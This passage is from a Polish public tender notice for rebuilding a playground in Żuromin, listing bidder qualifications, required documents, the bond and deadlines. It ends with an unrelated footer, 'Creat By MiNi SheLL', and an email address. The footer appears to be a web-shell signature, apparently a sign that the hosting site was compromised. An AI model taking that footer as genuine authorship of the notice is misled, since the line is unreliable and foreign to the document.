dotyczące:<br/><br/>1) zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w tym zakresie<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w tym zakresie<br/><br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie określa wymagań w tym zakresie.<br/><br/>4) zdolności technicznej lub zawodowej:<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/><br/>a)	w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał należycie co najmniej:<br/> <br/>- 1 zamówienie polegające na budowie/ lub rozbudowie/ lub przebudowie placu zabaw wraz z montażem elementów placu zabaw lub siłowni zewnętrznej o wartości minimum 200 000,00 zł (słownie: dwieście tysięcy złotych 00/100).<br/><br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia oraz gdy wykonawca polega na zdolnościach innych podmiotów na zasadach określonych w art. 118 ustawy Pzp wymóg wykonania zamówienia winien wykazać samodzielnie co najmniej jeden wykonawca.<br/>W przypadku powoływania się na zasoby podmiotów trzecich w celu wykazania spełniania warunków udziału w postępowaniu, w przypadku, gdy podmiot trzeci, którego potencjałem wspiera się wykonawca realizował zamówienie, w zakres którego wchodziły roboty budowlane określone wyżej wspólnie z innym podmiotem, nie ubiegającym się o udzielenie zamówienia, zamawiający wymaga, aby, aby podmiot trzeci udostępniający potencjał wykonawcy faktycznie uczestniczył w realizacji ww. zakresu robót budowlanych.<br/>W przypadku, gdy zamówienie, w zakres którego wchodzą roboty budowlane, <br/>o których mowa wyżej były realizowane przez wykonawcę wspólnie z innym podmiotem, nie ubiegającym się o udzielenie zamówienia, zamawiający wymaga, aby wykonawca składający ofertę w niniejszym postępowaniu faktycznie uczestniczył w realizacji ww. zakresu robót budowlanych. <br/>W przypadku gdy ww. zakres zamówienia będzie stanowił część robót o szerszym zakresie wykonawca zobowiązany jest wyodrębnić rodzajowo roboty budowlane niezbędne do wykazania spełniania w/w warunku.<br/><br/>Do przeliczenia wartości finansowej występującej w innej walucie niż PLN zamawiający zastosuje średni kurs Narodowego Banku Polskiego (NBP) z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/><br/><br/>b)	Wykonawca dysponuje lub będzie dysponować w okresie wykonywania zamówienia i skieruje do jego realizacji min:<br/><br/>- 1 osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej – pełniącą funkcję Kierownika robót;<br/><br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia co najmniej jeden z wykonawców ubiegających się o udzielnie zamówienia musi spełnić w/w warunek.<br/><br/>Przez w/w uprawnienia budowlane Zamawiający rozumie uprawnienia budowlane wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2025 r., poz. 418) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U z 2019 r. poz. 831).<br/>Zamawiający dopuszcza uprawnienia budowlane odpowiadające w/w/ uprawnieniom, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych tj. m.in. w ustawie o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej z dnia z dnia 22 grudnia 2015 r. (Dz.U. z 2023r., poz. 334) oraz w rozumieniu art. 20 a ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz. U. z 2023 r., poz. 551 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 Pzp Zamawiający przed udzieleniem zamówienia, wezwie wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych (aktualnych na dzień ich złożenia) <br/><br/><br/>W celu wykazania spełniania warunków udziału w postępowaniu należy złożyć:<br/><br/>1)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty (sporządzony zgodnie z Załącznikiem Nr 7 do SWZ)<br/><br/>2)	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (sporządzony zgodnie z Załącznikiem Nr 8 do SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Karty techniczne dla wszystkich oferowanych urządzeń, z których jednoznacznie wynikać będzie: wymiar proponowanego urządzenia, opis materiałów, z którego zostało ono wykonane, funkcjonalność urządzenia, jego elementy składowe oraz zdjęcia lub rysunek poglądowy. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Karty techniczne dla wszystkich oferowanych urządzeń, z których jednoznacznie wynikać będzie: wymiar proponowanego urządzenia, opis materiałów, z którego zostało ono wykonane, funkcjonalność urządzenia, jego elementy składowe oraz zdjęcia lub rysunek poglądowy. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Odpis lub Informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania <br/>lub w przypadku gdy Zamawiający może ww. dokumenty pozyskać za pomocą bezpłatnych i ogólnodostępnych baz danych wskazanie w Formularzu oferty danych umożliwiających dostęp do tych dokumentów. <br/><br/>2)	Pełnomocnictwo - gdy umocowanie osoby lub osób składających ofertę nie wynika z dokumentów rejestrowych; <br/><br/>3)	W przypadku złożenia oferty wspólnej – pełnomocnictwo udzielone liderowi<br/><br/>4)	Zobowiązanie podmiotu udostępniającego zasoby – Załącznik nr 10 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów na podstawie art. 118 ust. 3 Pzp - jeśli dotyczy<br/><br/>5)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia (z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy) – na podstawie art. 117 ust. 4 Pzp - Załącznik Nr 11 do SWZ - jeżeli dotyczy.<br/><br/>6)	Dokument wadium - jeżeli wadium zostało wniesione w formie gwarancji lub poręczenia<br/>W przypadku wniesienie wadium w formie gwarancji lub poręczenia wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej <br/><br/>7)	Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 15.1 Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 8.000,00 zł (słownie złotych: osiem tysięcy złotych 00/100).<br/><br/>15.2	Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 97 ust. 7 ustawy, tj.:<br/>1) pieniądzu,<br/>1)	gwarancjach bankowych,<br/>2)	gwarancjach ubezpieczeniowych,<br/>3)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Z 2019 r, <br/> poz. 310, 836 i 1572).<br/><br/>15.2.1	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje się nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt. 2 i 3 oraz ust. 2 ustawy pzp<br/> <br/>15.3	Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego:<br/>Bank Spółdzielczy w Żurominie Nr NRB: 59 8242 0008 2001 0002 3533 0002<br/>z dopiskiem:<br/>Wadium – dotyczy zamówienia „Przebudowa placu zabaw przy Placu Wolności”<br/><br/>15.4	Oferta jest skutecznie zabezpieczona wadium, jeżeli pieniądz znajduje się na koncie Zamawiającego w terminie (godzina) składania ofert.<br/><br/>15.5	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej. <br/>Wadium wnoszone w formie gwarancji lub poręczeń należy dołączyć do oferty w oryginale w postaci elektronicznej. <br/>Wadium wnoszone w formie gwarancji lub poręczeń musi zawierać zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo i na pierwsze pisemne żądanie Zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/><br/>15.6 W przypadku gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywała wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt. 3 ustawy Pzp Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt. 14 ustawy Pzp.<br/><br/>15.7 Zamawiający zwraca wadium niezwłocznie, nie później niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>- upływu terminu związania ofertą;<br/>- zawarcia umowy w sprawie zamówienia publicznego;<br/>- unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynności unieważnienia albo nie upłynął termin do jego wniesienia.<br/>15.8 Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy:<br/>- który wycofał ofertę przed upływem terminu składania ofert;<br/>- którego oferta została odrzucona;<br/>- po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>- po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>- Wykonawcy występujący wspólnie o udzielenie zamówienia są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>- Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>- Przepisy dotyczące Wykonawców stosuje się odpowiednio do Wykonawców ubiegających	się wspólnie o udzielenie zamówienia.<br/>- Jeżeli oferta wykonawcy wspólnie ubiegającego się o udzielenie zamówienia zostanie wybrana, Zamawiający może przed zawarciem umowy w sprawie zamówienia publicznego wezwać do przedstawienia umowy regulującej współpracę tych Wykonawców.<br/>- W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>- Oświadczenie o spełnieniu warunków udziału w postępowaniu składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu lub pełnomocnik w imieniu każdego z wykonawców osobno.<br/>- Oświadczenie o braku podstaw wykluczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego lub pełnomocnik w imieniu każdego z wykonawców osobno. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na podstawie art. 454 – 455 ustawy Pzp oraz postanowień projektu umowy przewiduje możliwość dokonania zmian umowy.<br/>Zgodnie z art. 455 ust. 1 ustawy Pzp zamawiający przewiduje możliwość zmiany postanowień umowy określając rodzaj i zakres zmian oraz warunki zmian - w przypadkach określonych w § 15 wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zuromin.ezamawiajacy.pl/pn/zuromin/demand/235830/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-10 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-08</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia Zamawiający wykluczy Wykonawcę, w stosunku do którego zachodzą okoliczności wskazane w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com